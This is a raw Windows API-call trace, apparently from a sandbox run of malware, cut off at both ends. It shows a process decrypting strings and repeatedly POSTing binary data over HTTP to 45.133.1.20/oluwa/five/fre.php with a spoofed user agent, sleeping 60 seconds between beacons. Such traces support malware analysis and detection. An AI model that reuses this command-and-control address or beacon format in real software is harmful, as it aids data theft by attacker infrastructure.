0x6b0af0 [0312.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.723] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0312.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.724] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.726] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.726] GetProcessHeap () returned 0x6a0000 [0312.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0312.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.728] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0312.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.730] CryptDestroyKey (hKey=0x6ad020) returned 1 [0312.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.731] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0312.731] GetProcessHeap () returned 0x6a0000 [0312.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.733] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.738] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.740] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.741] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.741] GetProcessHeap () returned 0x6a0000 [0312.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0312.741] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.742] GetProcessHeap () returned 0x6a0000 [0312.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0312.742] GetProcessHeap () returned 0x6a0000 [0312.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.743] GetProcessHeap () returned 0x6a0000 [0312.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.744] GetProcessHeap () returned 0x6a0000 [0312.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0312.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.745] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0312.797] GetProcessHeap () returned 0x6a0000 [0312.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.801] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0312.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.801] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.802] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.802] GetProcessHeap () returned 0x6a0000 [0312.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.804] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0312.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.806] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0312.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.807] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0312.807] GetProcessHeap () returned 0x6a0000 [0312.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0312.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0312.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0312.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.821] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0312.821] GetProcessHeap () returned 0x6a0000 [0312.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0312.821] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0312.821] GetProcessHeap () returned 0x6a0000 [0312.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0312.821] socket (af=2, type=1, protocol=6) returned 0xbf0 [0312.822] connect (s=0xbf0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0312.845] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0312.845] GetProcessHeap () returned 0x6a0000 [0312.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0312.845] GetProcessHeap () returned 0x6a0000 [0312.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0312.846] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.847] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.847] GetProcessHeap () returned 0x6a0000 [0312.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfc28 [0312.847] GetProcessHeap () returned 0x6a0000 [0312.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.847] GetProcessHeap () returned 0x6a0000 [0312.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0312.848] GetProcessHeap () returned 0x6a0000 [0312.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0312.849] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.850] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.850] GetProcessHeap () returned 0x6a0000 [0312.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0312.850] GetProcessHeap () returned 0x6a0000 [0312.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.851] send (s=0xbf0, buf=0x6bd460*, len=242, flags=0) returned 242 [0312.852] send (s=0xbf0, buf=0x6bb998*, len=159, flags=0) returned 159 [0312.852] GetProcessHeap () returned 0x6a0000 [0312.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0312.852] recv (in: s=0xbf0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0312.920] GetProcessHeap () returned 0x6a0000 [0312.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0312.922] GetProcessHeap () returned 0x6a0000 [0312.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.923] GetProcessHeap () returned 0x6a0000 [0312.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfc28 | out: hHeap=0x6a0000) returned 1 [0312.923] GetProcessHeap () returned 0x6a0000 [0312.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0312.923] closesocket (s=0xbf0) returned 0 [0312.925] GetProcessHeap () returned 0x6a0000 [0312.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0312.925] GetProcessHeap () returned 0x6a0000 [0312.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.925] GetProcessHeap () returned 0x6a0000 [0312.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0312.926] GetProcessHeap () returned 0x6a0000 [0312.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0312.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1930) returned 0xbf0 [0312.934] Sleep (dwMilliseconds=0xea60) [0312.937] GetProcessHeap () returned 0x6a0000 [0312.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0312.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.939] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0312.968] GetProcessHeap () returned 0x6a0000 [0312.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.969] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0312.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.971] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.972] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.972] GetProcessHeap () returned 0x6a0000 [0312.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.974] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0312.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.976] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0312.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.977] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0312.977] GetProcessHeap () returned 0x6a0000 [0312.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.979] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.985] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.986] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.986] GetProcessHeap () returned 0x6a0000 [0312.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0312.987] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.987] GetProcessHeap () returned 0x6a0000 [0312.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0312.988] GetProcessHeap () returned 0x6a0000 [0312.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.988] GetProcessHeap () returned 0x6a0000 [0312.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.989] GetProcessHeap () returned 0x6a0000 [0312.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0312.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0313.016] GetProcessHeap () returned 0x6a0000 [0313.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0313.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.027] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0313.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.029] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.030] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.030] GetProcessHeap () returned 0x6a0000 [0313.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0313.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.032] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0313.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.033] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0313.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.038] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0313.038] GetProcessHeap () returned 0x6a0000 [0313.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0313.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0313.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.041] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0313.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0313.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0313.043] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0313.043] GetProcessHeap () returned 0x6a0000 [0313.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0313.043] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0313.043] GetProcessHeap () returned 0x6a0000 [0313.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0313.043] socket (af=2, type=1, protocol=6) returned 0xbf4 [0313.044] connect (s=0xbf4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0313.067] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0313.067] GetProcessHeap () returned 0x6a0000 [0313.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0313.067] GetProcessHeap () returned 0x6a0000 [0313.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0313.068] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.071] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0313.071] GetProcessHeap () returned 0x6a0000 [0313.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6def68 [0313.071] GetProcessHeap () returned 0x6a0000 [0313.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.071] GetProcessHeap () returned 0x6a0000 [0313.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0313.071] GetProcessHeap () returned 0x6a0000 [0313.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0313.072] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0313.073] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0313.073] GetProcessHeap () returned 0x6a0000 [0313.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0313.073] GetProcessHeap () returned 0x6a0000 [0313.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0313.074] send (s=0xbf4, buf=0x6bd460*, len=242, flags=0) returned 242 [0313.075] send (s=0xbf4, buf=0x6bb998*, len=159, flags=0) returned 159 [0313.075] GetProcessHeap () returned 0x6a0000 [0313.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0313.075] recv (in: s=0xbf4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0313.142] GetProcessHeap () returned 0x6a0000 [0313.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0313.143] GetProcessHeap () returned 0x6a0000 [0313.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0313.144] GetProcessHeap () returned 0x6a0000 [0313.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def68 | out: hHeap=0x6a0000) returned 1 [0313.144] GetProcessHeap () returned 0x6a0000 [0313.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0313.146] closesocket (s=0xbf4) returned 0 [0313.146] GetProcessHeap () returned 0x6a0000 [0313.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0313.147] GetProcessHeap () returned 0x6a0000 [0313.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0313.147] GetProcessHeap () returned 0x6a0000 [0313.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0313.148] GetProcessHeap () returned 0x6a0000 [0313.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0313.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1934) returned 0xbf4 [0313.150] Sleep (dwMilliseconds=0xea60) [0313.152] GetProcessHeap () returned 0x6a0000 [0313.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0313.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0313.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0313.204] GetProcessHeap () returned 0x6a0000 [0313.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0313.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.205] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0313.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.206] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0313.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.207] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.207] GetProcessHeap () returned 0x6a0000 [0313.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0313.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0313.209] CryptDecrypt 